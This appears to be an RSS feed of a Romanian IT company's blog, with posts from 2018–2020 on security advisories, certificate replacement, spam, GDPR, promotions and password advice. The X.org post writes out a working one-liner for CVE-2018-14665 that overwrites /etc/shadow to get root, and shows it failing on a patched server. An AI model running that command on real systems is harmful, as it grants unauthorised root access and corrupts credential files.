Blog CAMSCAPE https://www.camscape.ro Canal RSS feeds - blog CAMSCAPE Windows DNS Server Remote Code Execution Vulnerability https://www.camscape.ro/compania/blog/windows-dns-server-remote-code-execution-vulnerability Wed, 15 Jul 2020 10:02:56 +0300 CVE-2020-1350 sau Windows DNS Server Remote Code Execution este o vulnerabilitate extrem de grava a oricarui server Windows variantele 2003 pana la 2019 inclusiv.

Asa cum se poate observa in CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=ALAS-2020-1350 , vulnerabilitatea a fost descoperita in Noiembrie 2019, dar pusa la dispozitia publicului de abia acum, odata cu patch-ul creat de Microsoft pentru rezolvarea acestei probleme.

Vulnerabilitatea permite executia de cod remote prin adresarea de query-uri modificate catre serviciul DNS activ pe Windows Server. Avand in vedere tipul de atac precum si faptul ca nu este necesara interventia utilizatorului, o infectare in retea este foarte simpla, ducand la o gravitate comparabila cu WannaCry.

Va recomandam sa faceti urgent update pe orice sistem de operare Microsoft Windows Server pentru a instala patch-ul de securitate.

Clientii camscape nu sunt in nici un fel afectati de aceasta vulnerabilitate. Nu exista servere Microsoft Windows aflate in mentenanta camscape care sa fie direct conectate la Internet si nici cu serviciul DNS activ.

 

]]>
Expirare certificat SSL SECTIGO https://www.camscape.ro/compania/blog/expirare-certificat-ssl-sectigo Sat, 30 May 2020 21:04:48 +0300 Azi 30.05.2020 ora 06:00 UTC a expirat certificatul USER Trust al SECTIGO.

Astfel, desi aveti certificate reinoite, valide, este posibil ca diverse browsere sa va marcheze site-ul ca "Not secure"

Tot ce aveti de facut este sa inlocuiti vechiul certificat User trust:

-----BEGIN CERTIFICATE-----
MIIFdzCCBF+gAwIBAgIQE+oocFv07O0MNmMJgGFDNjANBgkqhkiG9w0BAQwFADBv
MQswCQYDVQQGEwJTRTEUMBIGA1UEChMLQWRkVHJ1c3QgQUIxJjAkBgNVBAsTHUFk
ZFRydXN0IEV4dGVybmFsIFRUUCBOZXR3b3JrMSIwIAYDVQQDExlBZGRUcnVzdCBF
eHRlcm5hbCBDQSBSb290MB4XDTAwMDUzMDEwNDgzOFoXDTIwMDUzMDEwNDgzOFow
gYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpOZXcgSmVyc2V5MRQwEgYDVQQHEwtK
ZXJzZXkgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJUUlVTVCBOZXR3b3JrMS4wLAYD
VQQDEyVVU0VSVHJ1c3QgUlNBIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MIICIjAN
BgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAgBJlFzYOw9sIs9CsVw127c0n00yt
UINh4qogTQktZAnczomfzD2p7PbPwdzx07HWezcoEStH2jnGvDoZtF+mvX2do2NC
tnbyqTsrkfjib9DsFiCQCT7i6HTJGLSR1GJk23+jBvGIGGqQIjy8/hPwhxR79uQf
jtTkUcYRZ0YIUcuGFFQ/vDP+fmyc/xadGL1RjjWmp2bIcmfbIWax1Jt4A8BQOujM
8Ny8nkz+rwWWNR9XWrf/zvk9tyy29lTdyOcSOk2uTIq3XJq0tyA9yn8iNK5+O2hm
AUTnAU5GU5szYPeUvlM3kHND8zLDU+/bqv50TmnHa4xgk97Exwzf4TKuzJM7UXiV
Z4vuPVb+DNBpDxsP8yUmazNt925H+nND5X4OpWaxKXwyhGNVicQNwZNUMBkTrNN9
N6frXTpsNVzbQdcS2qlJC9/YgIoJk2KOtWbPJYjNhLixP6Q5D9kCnusSTJV882sF
qV4Wg8y4Z+LoE53MW4LTTLPtW//e5XOsIzstAL81VXQJSdhJWBp/kjbmUZIO8yZ9
HE0XvMnsQybQv0FfQKlERPSZ51eHnlAfV1SoPv10Yy+xUGUJ5lhCLkMaTLTwJUdZ
+gQek9QmRkpQgbLevni3/GcV4clXhB4PY9bpYrrWX1Uu6lzGKAgEJTm4Diup8kyX
HAc/DVL17e8vgg8CAwEAAaOB9DCB8TAfBgNVHSMEGDAWgBStvZh6NLQm9/rEJlTv
A73gJMtUGjAdBgNVHQ4EFgQUU3m/WqorSs9UgOHYm8Cd8rIDZsswDgYDVR0PAQH/
BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wEQYDVR0gBAowCDAGBgRVHSAAMEQGA1Ud
HwQ9MDswOaA3oDWGM2h0dHA6Ly9jcmwudXNlcnRydXN0LmNvbS9BZGRUcnVzdEV4
dGVybmFsQ0FSb290LmNybDA1BggrBgEFBQcBAQQpMCcwJQYIKwYBBQUHMAGGGWh0
dHA6Ly9vY3NwLnVzZXJ0cnVzdC5jb20wDQYJKoZIhvcNAQEMBQADggEBAJNl9jeD
lQ9ew4IcH9Z35zyKwKoJ8OkLJvHgwmp1ocd5yblSYMgpEg7wrQPWCcR23+WmgZWn
RtqCV6mVksW2jwMibDN3wXsyF24HzloUQToFJBv2FAY7qCUkDrvMKnXduXBBP3zQ
YzYhBx9G/2CkkeFnvN4ffhkUyWNnkepnB2u0j4vAbkN9w6GAbLIevFOFfdyQoaS8
Le9Gclc1Bb+7RrtubTeZtv8jkpHGbkD4jylW6l/VXxRTrPBPYer3IsynVgviuDQf
Jtl7GQVoP7o81DgGotPmjw7jtHFtQELFhLRAlSv0ZaBIefYdgWOWnU914Ph85I6p
0fKtirOMxyHNwu8=
-----END CERTIFICATE-----

cu cel nou:

-----BEGIN CERTIFICATE-----
MIIFgTCCBGmgAwIBAgIQOXJEOvkit1HX02wQ3TE1lTANBgkqhkiG9w0BAQwFADB7
MQswCQYDVQQGEwJHQjEbMBkGA1UECAwSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYD
VQQHDAdTYWxmb3JkMRowGAYDVQQKDBFDb21vZG8gQ0EgTGltaXRlZDEhMB8GA1UE
AwwYQUFBIENlcnRpZmljYXRlIFNlcnZpY2VzMB4XDTE5MDMxMjAwMDAwMFoXDTI4
MTIzMTIzNTk1OVowgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpOZXcgSmVyc2V5
MRQwEgYDVQQHEwtKZXJzZXkgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJUUlVTVCBO
ZXR3b3JrMS4wLAYDVQQDEyVVU0VSVHJ1c3QgUlNBIENlcnRpZmljYXRpb24gQXV0
aG9yaXR5MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAgBJlFzYOw9sI
s9CsVw127c0n00ytUINh4qogTQktZAnczomfzD2p7PbPwdzx07HWezcoEStH2jnG
vDoZtF+mvX2do2NCtnbyqTsrkfjib9DsFiCQCT7i6HTJGLSR1GJk23+jBvGIGGqQ
Ijy8/hPwhxR79uQfjtTkUcYRZ0YIUcuGFFQ/vDP+fmyc/xadGL1RjjWmp2bIcmfb
IWax1Jt4A8BQOujM8Ny8nkz+rwWWNR9XWrf/zvk9tyy29lTdyOcSOk2uTIq3XJq0
tyA9yn8iNK5+O2hmAUTnAU5GU5szYPeUvlM3kHND8zLDU+/bqv50TmnHa4xgk97E
xwzf4TKuzJM7UXiVZ4vuPVb+DNBpDxsP8yUmazNt925H+nND5X4OpWaxKXwyhGNV
icQNwZNUMBkTrNN9N6frXTpsNVzbQdcS2qlJC9/YgIoJk2KOtWbPJYjNhLixP6Q5
D9kCnusSTJV882sFqV4Wg8y4Z+LoE53MW4LTTLPtW//e5XOsIzstAL81VXQJSdhJ
WBp/kjbmUZIO8yZ9HE0XvMnsQybQv0FfQKlERPSZ51eHnlAfV1SoPv10Yy+xUGUJ
5lhCLkMaTLTwJUdZ+gQek9QmRkpQgbLevni3/GcV4clXhB4PY9bpYrrWX1Uu6lzG
KAgEJTm4Diup8kyXHAc/DVL17e8vgg8CAwEAAaOB8jCB7zAfBgNVHSMEGDAWgBSg
EQojPpbxB+zirynvgqV/0DCktDAdBgNVHQ4EFgQUU3m/WqorSs9UgOHYm8Cd8rID
ZsswDgYDVR0PAQH/BAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wEQYDVR0gBAowCDAG
BgRVHSAAMEMGA1UdHwQ8MDowOKA2oDSGMmh0dHA6Ly9jcmwuY29tb2RvY2EuY29t
L0FBQUNlcnRpZmljYXRlU2VydmljZXMuY3JsMDQGCCsGAQUFBwEBBCgwJjAkBggr
BgEFBQcwAYYYaHR0cDovL29jc3AuY29tb2RvY2EuY29tMA0GCSqGSIb3DQEBDAUA
A4IBAQAYh1HcdCE9nIrgJ7cz0C7M7PDmy14R3iJvm3WOnnL+5Nb+qh+cli3vA0p+
rvSNb3I8QzvAP+u431yqqcau8vzY7qN7Q/aGNnwU4M309z/+3ri0ivCRlv79Q2R+
/czSAaF9ffgZGclCKxO/WIu6pKJmBHaIkU4MiRTOok3JMrO66BQavHHxW/BBC5gA
CiIDEOUMsfnNkjcZ7Tvx5Dq2+UUTJnWvu6rvP3t3O9LEApE9GQDTF1w52z97GA1F
zZOFli9d31kWTz9RvdVFGD/tSo7oBmF0Ixa1DVBzJ0RHfxBdiSprhTEUxOipakyA
vGp4z7h/jnZymQyd/teRCBaho1+V
-----END CERTIFICATE-----
]]>
Malware: Pericol ridicat. Contul dvs. a fost piratat. Va rugam sa schimbati parola imediat. https://www.camscape.ro/compania/blog/malware-pericol-ridicat-contul-dvs-a-fost-piratat-va-rugam-sa-schimbati-parola-imediat Tue, 21 Apr 2020 12:14:58 +0300 O campanie spam continand linkuri catre site-uri infectate este in curs de desfasurare incepand de ieri 20 Aprilie 2020

Pe diverse conturi, diverse servere email observam un trafic mare de mesaje cu subiectul:

 

Pericol ridicat. Contul dvs. a fost piratat. Va rugam sa schimbati parola imediat.

 

Serverele camscape catalogheaza corect mesajul ca fiind SPAM si il veti regasi in directorul Junk. Da, este chiar un SPAM.

Ca de obicei, va recomandam sa nu accesati linkuri necunoscute din mesajele primite si sa verificati cel putin faptul ca linkul are legatura cu subiectul si/sau cu cel care a trimis mesajul.

 

]]>
Achizitie in rate cu amanare la plata https://www.camscape.ro/compania/blog/achizitie-in-rate-cu-amanare-la-plata Wed, 15 Apr 2020 06:44:18 +0300 camscape in parteneriat cu GRENKE RENTING te ajuta sa achizitionezi echipamente IT noi chiar si pe timp de criza.

Incepand de acum si pana pe 29 Mai 2020, poti achizitiona echipamente IT fara sa adaugi in cheltuielile lunare plata lor. Vei plati de abia in luna Iulie.

Contacteaza-ne aici si iti vom oferi consultanta de care ai nevoie.

 

Achizitie in rate cu amanare la plata

]]>
Backup ca asigurare impotriva ransomware https://www.camscape.ro/compania/blog/backup-ca-asigurare-impotriva-ransomware Sat, 07 Mar 2020 17:07:56 +0200 Cu siguranta, cuvantul ransomware va spune ceva. Este acel malware care va cripteaza documentele si va trebui sa platiti 0.1 pana la 5 Bitcoin pentru a va recupera datele. Adica sume de la 1000 la 50.000 EUR. Mult.

Evident, una dintre protectiile posibile este backup-ul, asa cum este el definit. Adica zilnic, automatizat, in locatie externa (off-site eventual).

Dar iata ca cert-ro.ro preia o stire https://cert.ro/citeste/cybersecurity-news-04-mar-2020 de pe https://www.bleepingcomputer.com/news/security/ransomware-attackers-use-your-cloud-backups-against-you/ in care se spune un lucru evident: ransomware-urile moderne, dupa ce cripteaza fisierele locale, dupa ce cripteaza fisierele la care exista acces in retea, cauta clientul local de backup si incearca sa stearga backup-urile rulate. Adica sa va lase fara aparare.

camscape implementeaza SyncBackup . Clientul SyncBackup instalat local nu are functia de stergere backup deci este imun la astfel de atacuri. SyncBackup este o solutie securizata care rezista si la ultimele tipuri de atacuri.

 

]]>
Criptare mesaje email https://www.camscape.ro/compania/blog/criptare-mesaje-email Tue, 03 Mar 2020 10:15:29 +0200 In spiritul GDPR si nu numai, toate informatiile pastrate sau transmise ar trebui sa fie criptate.

O fraza care, in spiritul GDPR si al altor regulamente si norme de securitate, spune totul si in acelasi timp nimic.

Vorbind despre mesajele email, este mai simplu de explicat plecand de la riscuri. Daca un mesaj email nu este criptat (sau semnat), atunci se pot intampla urmatoarele:

  • mesajul poate fi interceptat si citit in tranzit intre serverele email, de catre o persoana care se poate conecta si asculta traficul extern al serverului email. Acest aspect este evitat de transmisia emailurilor criptate SSL/TLS, procedura realizata la nivel de server email si negociata intre serverul care emite mesajul si cel care il primeste
  • mesajul poate fi citit pe serverele pe care este stocat (cel care emite mesajul sau cel care il primeste) de catre un utilizator care are acest drept. Utilizatorii respectivi sunt in primul rand administratorii de sistem dar si un eventual atacator care dupa ce a atacatul site-ul (exemplu) a putut face elevare de drepturi. Acest aspect este evitat prin criptarea end-to-end, vezi mai jos
  • mesajul poate fi editat (este doar un fisier text) si prezentat intr-o forma alterata producand astfel probleme legale, financiare sau de alta natura. Aceasta modificare poate fi facuta de catre administratorii de sistem, de un eventual atacator care a penetrat sistemul dar chiar si de catre destinatarii mesajului. Acest aspect este evitat prin criptarea end-to-end sau chiar doar prin semnarea mesajului.

 

Pentru cele de mai sus, recomandam implementarea criptarii si semnarii folosind protocolul S/MIME. S/MIME este un certificat personal care se instaleaza in clientul email al fiecarui utilizator si ofera:

  • criptarea mesajului end-to-end. Astfel mesajul este pastrat criptat pe clientul email care trimite mesajul, pe serverul care trimite mesajul, in tranzit, pe serverul care primeste mesajul si in clientul email care primeste mesajul. Practic numai persoana care emite mesajul si numai persoana care primeste mesajul pot citi acest mesaj. Conditia necesara este ca ambele persoane sa aiba certificat S/MIME instalat si sa fi conversat anterior.
  • semnarea mesajului. Mesajul este semnat de certificatul S/MIME instalat in clientul email al celui care trimite mesajul, oferind astfel doua garantii suplimentare: persoana care a trimis mesajul este identificata prin certificat si, mai ales, mesajul nu a putut fi alterat in tranzit sau la primire.

 

camscape va ofera suport pentru instalarea si folosirea acestor certificate in clientii email folositi (Microsoft Outlook, Mozilla Thunderbird si chiar Webmail).

 

Certificatul recomandat este SECTIGO (fost COMODO) la numai 16,99 USD/an/cont email: https://sectigo.com/signing-certificates/email-smime-certificate

Referitor la legatura cu GDPR puteti citi aici: https://sectigo.com/lps/email-certificate-gdpr

 

 

 

]]>
A venit primavara! https://www.camscape.ro/compania/blog/a-venit-primavara Mon, 02 Mar 2020 14:03:06 +0200 A venit primavara si ca in orice an trimitem clientelor si clientilor nostri un mic martisor. Doamnele au primit simbolicul martisor, domnii unul mai potrivit:

 

Corona beer

O primavara superba va dorim.

 

 

]]>
Securitate minima pentru acasa https://www.camscape.ro/compania/blog/securitate-minima-pentru-acasa Sun, 04 Aug 2019 22:23:14 +0300 La birou avem diverse echipamente, diverse firewall, routere, abonamente si alte tool-uri care sa filtreze traficul si sa nu permita accesarea oricarui site. Dar toate au un tarif, un pret de cele mai multe ori lunar, normal avand in vedere impactul pe care il poate avea accesarea unui site nedorit.

Ce facem acasa? Avem si acasa nevoia de protectie, atat anti-malware prin limitarea accesului la site-uri cu continut periculos pentru calculatoarele, tabletele si telefoanele personale, cat si prin limitarea accesului cu un continut nepotrivit pentru copiii nostri. Bineinteles, putem activa aceleasi setari si acasa. Dar multi nu isi permit 100-1000 lei pe luna pentru asta.

Exista o solutie extrem de simplu de implementat din punct de vedere tehnic si gratuita pentru subiectul in discutie. Simpla setare a DNS-ului la https://cleanbrowsing.org/ limiteaza cu succes accesul la majoritatea site-urilor cu content malware sau adult. Vezi aici cum anume se seteaza: https://cleanbrowsing.org/getting-started .

Mai mult, testele facute de terti arata o rata buna de identificare si de limitare a malware-ului: https://medium.com/@nykolas.z/phishing-protection-comparing-dns-security-filters-9d5a09849b91 si https://hackernoon.com/porn-filters-compared-opendns-neustar-cleanbrowsing-norton-yandex-and-adguard-41f207062c4

Asa ca recomand pentru toate gradinitele si scolile, cat si pentru routerele simple de acasa aceasta setare. De la securitate zero, orice pas in sus e benefic.

 

]]>
Optimizare viteza de incarcare site si securitate https://www.camscape.ro/compania/blog/optimizare-viteza-de-incarcare-site-si-securitate Mon, 03 Jun 2019 18:48:28 +0300 Implementarea TLS 1.3 , noul standard de criptare, aduce mai multe avantaje decat un simplu update necesar de securitate.

  • Inlocuirea TLS 1.0 si TLS 1.1, vulnerabile cel putin la atacuri POODLE si BEAST. Serverele camscape ofera acum numai protocolul TLS 1.2 si TLS 1.3
  • Activarea cifrurilor ChaCha20. Conform https://tools.ietf.org/html/rfc7539 , ChaCha20 este de 3 ori mai rapid iar diferenta se vede in special pe procesoarele care nu suporta AES. Astfel, implementarea ChaCha20 imbunatateste considerabil viteza de incarcare a site-urilor pe echipamentele mobile, vezi aici: https://security.googleblog.com/2014/04/speeding-up-and-strengthening-https.html
  • Activarea 0-RTT care reduce foarte mult latenta de acces la site cu influenta mare asupra TTFB

0-RTT

Astfel, impreuna cu optiunile existente deja precum compresia BROTLI si HTTP/2 , serverele camscape ofera toate tehnologiile recomandate pentru un hosting rapid si sigur.

 

]]>
Bug in WinRAR care permite instalarea de Malware https://www.camscape.ro/compania/blog/bug-in-winrar-care-permite-instalarea-de-malware Thu, 21 Mar 2019 15:21:24 +0200 Un bug de 19 ani in WinRAR este folosit pentru a instala malware
 
WinRAR este una dintre cele mai folosite solutii pentru arhivare de documente, cu totii l-am folosit si probabil il folosim chiar acum. Insa, de luna trecuta s-a aflat un fapt care este cel putin la fel de creepy ca si scandalul Facebook, se pare ca datele personale inca sunt vulnerabile.
 
Compania Check Point a aflat ca WinRAR contine de 19 ani (!) un bug ce permite extragerea unui program de tip malware in directorul de start-up, malware ce porneste automat in background cand dam restart la PC : https://research.checkpoint.com/extracting-code-execution-from-winrar/
 
Hacker-ii pot manipula WinRAR prin redenumirea extensiei unui fisier de tip .ACE cu extensia .RAR, permitand astfel extragerea programelor malitioase in folder-ul de start-up al PC-ului. Compania WinRAR a reparat acest bug, insa user-ii care inca nu au dat update la versiunea 5.70 sunt vulnerabili inca.
 
Cu alte cuvinte, faceti update la ultima versiune.
 
Alternativ puteti folosi arhivatoare care au aceleasi functionalitati si nu costa nimic, inclusiv cele livrate nativ cu sistemul de operare. Cea mai buna alternativa la WinRAR este de departe cunoscutul tool de arhivare 7Zip https://www.7-zip.org/ , este open source si are toate functionalitatile necesare unei arhivari rapide si sigure. 
]]>
Citrix a fost hacked https://www.camscape.ro/compania/blog/citrix-a-fost-hacked Sat, 09 Mar 2019 11:20:46 +0200 Conform unui anunt de pe site-ul CITRIX https://www.citrix.com/blogs/2019/03/08/citrix-investigating-unauthorized-access-to-internal-network/ , reteaua interna a companiei a fost accesata de persoane neautorizate. CITRIX a aflat de problema nu prin propriile masuri de securitate ci in urma unui anunt primit de la FBI.

La acest moment, se pare ca nu exista compromiteri ale software-ului comercializat de CITRIX, hacker-ii limitandu-se la furtul de documente comerciale (deci inclusiv date cu caracter personal).

CITRIX este una dintre companiile de servicii IT si software foarte mari la nivel mondial, avand aproape jumatate de milion de clienti si oferind serviciile sale catre majoritatea companiilor din FORTUNE 500.

Dar iata ca si la companiile mari, cel mai mare risc de securitate IT nu este la nivel de echipamente sau software ci riscul uman. 

Va recomandam din nou sa setati parole complexe si unice pe orice echipament folosit, indiferent de cat de critic il considerati. Aici puteti citi un tutorial despre cum sa va setati o parola complexa .

 

]]>
Vulnerabilitate OpenOffice si LibreOffice https://www.camscape.ro/compania/blog/vulnerabilitate-openoffice-si-libreoffice Thu, 07 Feb 2019 23:08:23 +0200 LibreOffice     OpenOffice

 

LibreOffice si OpenOffice, variantele opensource ale Microsoft Office, sufera de o grava vulnerabilitate care permite executia de cod remote a unui atacator la simpla trecere a mouse-ului peste un link.

Astfel, conform CVE-2018-16858 si a unei demonstratii simple pe care o puteti vedea aici: https://insert-script.blogspot.com/2019/02/libreoffice-cve-2018-16858-remote-code.html , austriacul Alex Infuhr arata ca nu numai suitele Office Microsoft sufera de vulnerabilitati din cand in cand ci si variantele lor opensource.

Un update este deja disponibil pe pagina LibreOffice, OpenOffice ramane fara update, ceea ce e si normal avand in vedere suportul limitat oferit de OpenOffice in ultima vreme.

Pentru LibreOffice puteti accesa update-ul aici: https://www.libreoffice.org/download/download/ . Veti putea trece la noua versiune 6.2 care ofera inclusiv un meniu Office-like.

 

]]>
GDPR: Cookie conform GDPR verificate de Cookiebot https://www.camscape.ro/compania/blog/gdpr-cookie-conform-gdpr-verificate-de-cookiebot Wed, 06 Feb 2019 07:47:28 +0200 Cookie-urile unui site trebuie sa se supuna regulamentului GDPR de protejare a datelor cu caracter personal. Si aceasta setare nu este chiar atat de simpla cum pare la prima vedere.

Va puteti verifica propriul site folosind https://www.cookiebot.com/

camscape.ro este compliant GDPR:

Cookiebot GDPR

]]>
GDPR : Raspunderea generata de folosirea Facebook in site-uri https://www.camscape.ro/compania/blog/gdpr-raspunderea-generata-de-folosirea-facebook-in-site-uri Tue, 22 Jan 2019 10:00:43 +0200 Un vizitator care ajunge pe site-ul dvs poate trimite date personale catre Facebook (sau alte terte site-uri incluse prin plugin-uri). Cunoasteti butonul Like ce apare in diverse site-uri pentru a crea o relatie de promovare automata.

Avocatul general Bobek de la Curtea de Justitie a Uniunii Europene, a creat un precedent important in 19 Decembrie 2018 dupa cum puteti citi aici: https://curia.europa.eu/jcms/upload/docs/application/pdf/2018-12/cp180206ro.pdf .

Astfel, daca site-ul dvs trimite datele utilizatorilor catre Facebook sau alte site-uri terte, chiar si in situatia in care utilizatorul este in clar informat despre actiunea respectiva (si cred ca un buton de Like nu poate insemna o informare neclara), sunteti solidar cu Facebook in cazul in care se constata o pierdere de date la nivelul acestuia. Da, chiar daca nu aveti nici o vina.

In concluzie, atentie la sursele externe incluse in site-ul dvs. S-ar putea sa aduca trafic si avantaje dar s-ar putea sa va aduca niste raspunderi in afara controlului dvs.

 

]]>
La Multi Ani Camscape! https://www.camscape.ro/compania/blog/la-multi-ani-camscape Tue, 18 Dec 2018 17:02:13 +0200 camscape 22 years, christmas

Ho ho ho, iar e Craciunul

Mosu' fuge ca nebunul

De cadouri incarcat

El se plimba neincetat.

Cu ocazia asta noi,

Langa 20, am pus un 2

Si ca sa sarbatorim,

Noi cadouri oferim.

camscape 22 years, christmas

]]>
Activate Windows https://www.camscape.ro/compania/blog/activate-windows Fri, 09 Nov 2018 00:10:55 +0200 Daca primiti mesajul "Activate Windows":

Activate Windows

stati linistiti, nu e nici o problema cu licenta voastra (in cazul in care chiar e achizitionata legal, bineinteles).

Pe 8 Noiembrie 2018, Microsoft anunta un bug al serverelor sale de autentificare si la momentul acesta singura solutie este dezinstalarea Windows 10 PRO si instalarea Windows 10 Home. Vezi mai multe aici: https://answers.microsoft.com/en-us/windows/forum/all/windows-suddenly-deactivated/fe9a4ecf-2e2a-491d-a43e-b010c316d1c4?auth=1

Bineinteles, asta nu este o solutie viabila si Microsoft promite o rezolvare in cateva zile. Pana atunci, ignorati mesajul. Doar 2-3 zile de acum.

]]>
Vulnerabilitate X.org https://www.camscape.ro/compania/blog/vulnerabilitate-xorg Sat, 27 Oct 2018 00:15:16 +0300 O vulnerabilitate a popularului mediu grafic bazat pe X.org al sistemelor de operare Linux a fost descoperita si remediata: https://lists.x.org/archives/xorg-announce/2018-October/002927.html

Denumita ca CVE-2018-14665, vulnerabilitatea permite ca prin executia a numai 3 comenzi simple, orice utilizator poate deveni root:

cd /etc; Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1;su

In comanda de mai sus, un utilizator cu drepturi limitate suprascrie /etc/shadow cu un fisier in care utilizatorul root nu are parola.

Vulnerabilitatea CVE-2018-14665 afecteaza in principal OpenBSD, dar si sisteme RedHat, Ubuntu si Centos, toti acestia avand deja patch-uri disponibile, deci va recomandam update-ul de urgenta.

Serverele camscape NU sunt afectate in nici un fel de aceasta vulnerabilitate. Serverele camscape nici macar nu au mediul grafic activat pentru o optimizare deplina a resurselor.

websuser@robuhvm101:/ # cd /etc; Xorg -fp "root::16431:0:99999:7:::"  -logfile shadow  :1;su
 
Fatal server error:
The '-logfile' option can only be used by root.
 
Please consult the The X.Org Foundation support
         at http://wiki.x.org
 for help.
 
Password:
su: Authentication failure
websuser@robuhvm101:/etc #

 

]]>
Web Application Firewall (WAF) de la Malware Expert https://www.camscape.ro/compania/blog/web-application-firewall-waf-de-la-malware-expert Wed, 24 Oct 2018 12:28:52 +0300 Web Application Firewall (WAF) de la Malware Expert

camscape este reseller al Malware Expert, dupa cum puteti observa aici https://malware.expert/partners-and-vendors/

Malware Expert ( https://malware.expert ) este un producator de reguli de Web Application Firewall (WAF) bazat pe ModSecurity ( http://www.modsecurity.org ).

Furnizorii de servicii de gazduire sufera zilnic consecintele multiplelor vulnerabilitati de securitate gasite in CMS-urile utilizate in mod obisnuit, cum ar fi WordPress, Drupal si Joomla, dar si pentru aplicatii web custom.

Malware Expert ofera protectie impotriva unor astfel de atacuri de tip malware si netbot, chiar inainte ca clientii sa aplice patch-uri de securitate pe respectivele CMS-urile lor si deci inainte ca site-ul lor sa fie hacked, pastrand in acelasi timp functionalitatea site-ului. Nivelul de false positive este minim.

Regulile Web Application Firewall (WAF) sunt dezvoltate de Malware Expert incepand cu 2005 si acum protejeaza peste 10.000 de site-uri, acoperind peste 99,9% din atacurile generice.

Costul activarii WAF Malware Expert este de doar 5,00 EUR/luna . Implementarea este bineinteles GRATUITA pe serverele aflate in mentenanta camscape.

Conform cerintelor GDPR, aici https://malware.expert/privacy-notice/ puteti parcurge politica de confidentialitate a Malware Expert.

 

 

]]>
IMWORLD 2018 https://www.camscape.ro/compania/blog/imworld-2018 Sun, 07 Oct 2018 00:28:34 +0300 Intre 3 si 4 octombrie 2018, echipa camscape a participat din nou la evenimentul anual IMWORLD (https://www.imworld.ro). Si de aceasta data atat ca suport tehnic cat si ca expozanti.

Dupa toate intalnirile avute, unele de succes, va aratam doar doua poze, inainte si dupa eveniment:

IMWORLD 2018 Camscape

 

IMWORLD 2018 Camscape

]]>
Update la Windows 10 1809 va poate sterge documentele https://www.camscape.ro/compania/blog/update-la-windows-10-1809-va-poate-sterge-documentele Sat, 06 Oct 2018 20:48:51 +0300 In 02 Octombrie 2018, Microsoft a lansat noua varianta Windows 10 versiune 1809.

Pe langa cateva, oarecum neimportante, schimbari, aduce o problema foarte grava si anume stergerea profilului utilizatorului si implicit a diverse documente pe care acesta le are salvate in profil. 

Microsoft a aflat de problema azi 06 Octombrie 2018 si a oprit temporar update-ul: https://support.microsoft.com/en-us/help/4464619/windows-10-update-history

Vestea buna este ca update-ul nu a fost inca fortat ci a afectat doar pe cei care au verificat manual update-ul. Inca o veste buna este ca exista si o rezolvare pentru preventie: modificati setarea din 

Computer Configuration/Administrative Templates/System/User Profiles/Delete user profiles older than a specified number of days on system restart

din "Not configured" in "Disabled" . Practic exact aceasta este bug-ul introdus de catre update, schimbarea default-ului acestei setari din Disabled in Enabled la 24 ore, ceea ce duce la stergerea profilului oricarui utilizator.

Vestea proasta este ca este extrem de simplu de implementat pe un Active Directory, dar foarte compilcat acolo unde nu exista un Active Directory sau este vorba de sisteme personale instalate cu Windows Home.

Cel mai sigur este ca pentru moment sa amanati trecerea la noua varianta.

 

]]>
SEO pe Instagram https://www.camscape.ro/compania/blog/seo-pe-instagram Sun, 23 Sep 2018 15:15:13 +0300 Social Marketing este ceva vechi si o vreme insemna doar Facebook. Dar in ultima vreme inseamna din ce in ce mai mult Instagram.

Dar cum sa faci un post de succes pe Instagram. Iata cateva sugestii:

Noul algoritm Instagram favorizeaza posturile cu implicare mare, astfel ca atunci cand un post primeste o multime de like-uri si comentarii, acest lucru indica algoritmului faptul ca este vorba de continut de inalta calitate pe care alti utilizatori ar dori să il vada.
 
 
Folositi-va de cele 5 simturi:
 
  • Descrieti cum arata locul, lumina si culorile lucrurilor pe care le puteti vedea in imagine.
  • Descrieti sunetul.
  • Descrieti vremea si temperatura.
  • Descrieti mirosul.
  • Descrieti gustul.
 
Povestea e importanta.
 
  • Ce este asta?
  • Cand s-a intamplat?
  • Unde este?
  • De ce arati asta? De ce s-a intamplat asta?
  • Cine este personajul principal al povestii?
  • Cum ai ajuns acolo? Cum s-a intamplat?
 
 
Rezolvati problemele audientei
 
Identificati o problema comuna in afacerea sau industria dvs. si imaginati-va cum poate fi rezolvata această problema. Dati-le solutia. Apoi, construiti o propozitie care mentionează aceste trei puncte-cheie.
 
 
Utilizati hashtag-urile potrivite
 
Hashtag-urile sunt extrem de importante pe Instagram si ar trebui sa fie utilizate la fiecare post pentru a creste audienta. Alegeti 10-15 hashtag-uri relevante pentru a le include intr-un post. Nu utilizati hashtaguri populare. Utilizand hashtag-uri generale, nu va aratati fotografia pe niciuna dintre tagurile hashtag.
 
De fiecare data cand va ganditi sa adaugati un hashtag, intrebati-va: "Este acest hashtag NUMAI folosit de publicul meu tinta sau de alte persoane pe Instagram?"
DA: adaugati hashtag-ul. NU: nu adaugati hashtag-ul.
 
 
Reteta pentru posturi grozave pe Instagram si continut de inalta calitate:
 
  • 1 imagine frumoasa
  • 2 picaturi de creativitate
  • 1 gram de inspiratie
  • 1 kilogram de originalitate
  • Cateva cuvinte
 
 
IMPORTANT: post-ul acesta este (mai mult decat) inspirat de un Spam pe care l-am primit. Avand in vedere ca e un spam, mi se pare normal sa ne insusim textul si sa nu mentionam si sursa originala. Dar ideile sunt bune.
 
]]>
Ce parola sa imi pun https://www.camscape.ro/compania/blog/ce-parola-sa-imi-pun Sun, 29 Jul 2018 22:54:17 +0300 Setarea unei parole ar trebui sa fie ceva simplu si normal. Totusi, se fac multe alegeri gresite si mai devreme sau mai tarziu apar si efectele neplacute.

Varianta scurta:

  • o parola trebuie sa fie lunga (sa aiba multe caractere), sa contina litere mari, litere mici, cifre si chiar si semne
  • o parola nu trebuie refolosita. Daca o folositi intr-un loc, pe un site, pe calculator, nu o refolositi pe alt site
  • o parola trebuie schimbata la un interval regulat, de preferat cu o alta parola, fara legatura cu cea anterioara

